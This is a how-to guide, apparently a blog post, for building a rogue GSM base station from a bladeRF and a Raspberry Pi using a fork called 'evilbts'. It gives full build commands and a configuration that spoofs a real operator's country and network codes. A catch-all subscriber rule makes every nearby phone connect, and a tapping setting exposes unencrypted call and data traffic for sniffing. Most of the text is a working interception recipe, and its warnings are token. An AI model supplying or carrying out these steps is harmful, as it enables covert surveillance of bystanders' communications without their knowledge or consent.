Becoming your own Verizon

Grow-Your-Own Cellular Network Carrier

Want to start your own surveillance state? Well now you can! GSM is broken by design, so for now, anyone can create private GSM networks used for monitoring nearby mobile cellular devices, which is how “StingRay” intercepts communications at civilian political protests. (Do not try this at home.)

You will need the following hardware:

• A bladeRF x40 (~$600)
• Two Quad-band Cellular Duck Antennas SMA. (~$50)
• A Raspberry Pi 3 ( model 2 and below are too slow ). (~$40)
• An USB battery pack ( I’m using a 26800mAh Anker Astro E7 ). ($20)
• A microSD card >= 8GB. ($10)

Flash the SD card with the latest Raspbian image (32-bit lite)

Install the following dependencies:

sudo apt-get install git apache2 php5 bladerf libbladerf-dev libbladerf0 automake

You should already be able to interact with the BladeRF, so plug it into one of the USB ports of the RPI, dmesg should be telling you something like:

[ 2332.071675] usb 1-1.3: New USB device found, idVendor=1d50, idProduct=6066
[ 2332.071694] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 2332.071707] usb 1-1.3: Product: bladeRF
[ 2332.071720] usb 1-1.3: Manufacturer: Nuand
[ 2332.071732] usb 1-1.3: SerialNumber: b4ef330e19b718f752759b4c14020742

Start the bladeRF-cli utility and issue the version command:

pi@raspberrypi:~ $ sudo bladeRF-cli -i
bladeRF> version

  bladeRF-cli version:        0.11.1-git
  libbladeRF version:         0.16.2-git

  Firmware version:           1.6.1-git-053fb13-buildomatic
  FPGA version:               0.1.2

bladeRF>

NOTE: Make sure you have these exact versions of the firmware and the FPGA, other versions might not work in our setup. Download the correct firmware and FPGA image.

Next, install Yate and YateBTS to create the BTS:

git clone https://github.com/evilsocket/evilbts.git
cd evilbts

cd yate
./autogen.sh
./configure --prefix=/usr/local
make -j4
sudo make install
sudo ldconfig
cd ..

cd yatebts
./autogen.sh
./configure --prefix=/usr/local
make -j4
sudo make install
sudo ldconfig

cd /var/www/html/
sudo ln -s /usr/local/share/yate/nib_web nib

sudo chmod -R a+w /usr/local/etc/yate

Access the GUI from your browser:

http://ip-of-your-box/nib

Configuration

Open the /usr/local/etc/yate/ybts.conf file either with nano or vi and update the following values:

Radio.Band=900
Radio.C0=1000
Identity.MCC=YOUR_COUNTRY_MCC
Identity.MNC=YOUR_OPERATOR_MNC
Identity.ShortName=MyEvilBTS
Radio.PowerManager.MaxAttenDB=35
Radio.PowerManager.MinAttenDB=35

You can find valid MCC and MNC values here.

Now, edit the /usr/local/etc/yate/subscribers.conf:

country_code=YOUR_CONTRY_CODE
regexp=.*

WARNING Using the .* regex will make EVERY phone in your area connect to your BTS.

Enable GSM-Tapping

In the “Tapping” panel, you can enable it for both GSM and GPRS, this will basically “bounce” every GSM packet to the loopback interface, since we haven’t configure any encryption, you’ll see all the GSM traffic by simply tcpdump-ing your loopback interface.

Now start your new BTS by executing the command with BladeRF plugged in!

sudo yate -s

Starting MBTS...
Yate engine is initialized and starting up on raspberrypi
RTNETLINK answers: File exists
MBTS ready

** The middle LED for your bladeRF should start blinking.

Phones will start to automatically connect, this will happen because of the GSM implementation itself:

• You can set whatever MCC, MNC and LAC you like, effectly spoofing any legit GSM BTS.
• Each phone will search for BTS of its operator and select the one with the strongest signal

From now on, you can configure the BTS to do whatever you want … either act as a “proxy” to a legit SMC ( with a GSM/3g USB dongle ) and sniff the unencrypted GSM traffic of each phone, or to create a private GSM network where users can communicate for free using SIP, refer to the YateBTS Wiki for specific configurations.

WARNING: DO NOT USE THIS UNLESS YOU’RE A LICENSED TELECOMM SERVICE PROVIDER OR YOU’RE THE POLICE OR YOU’RE IN A FARADAY CAGE KTHXBYE.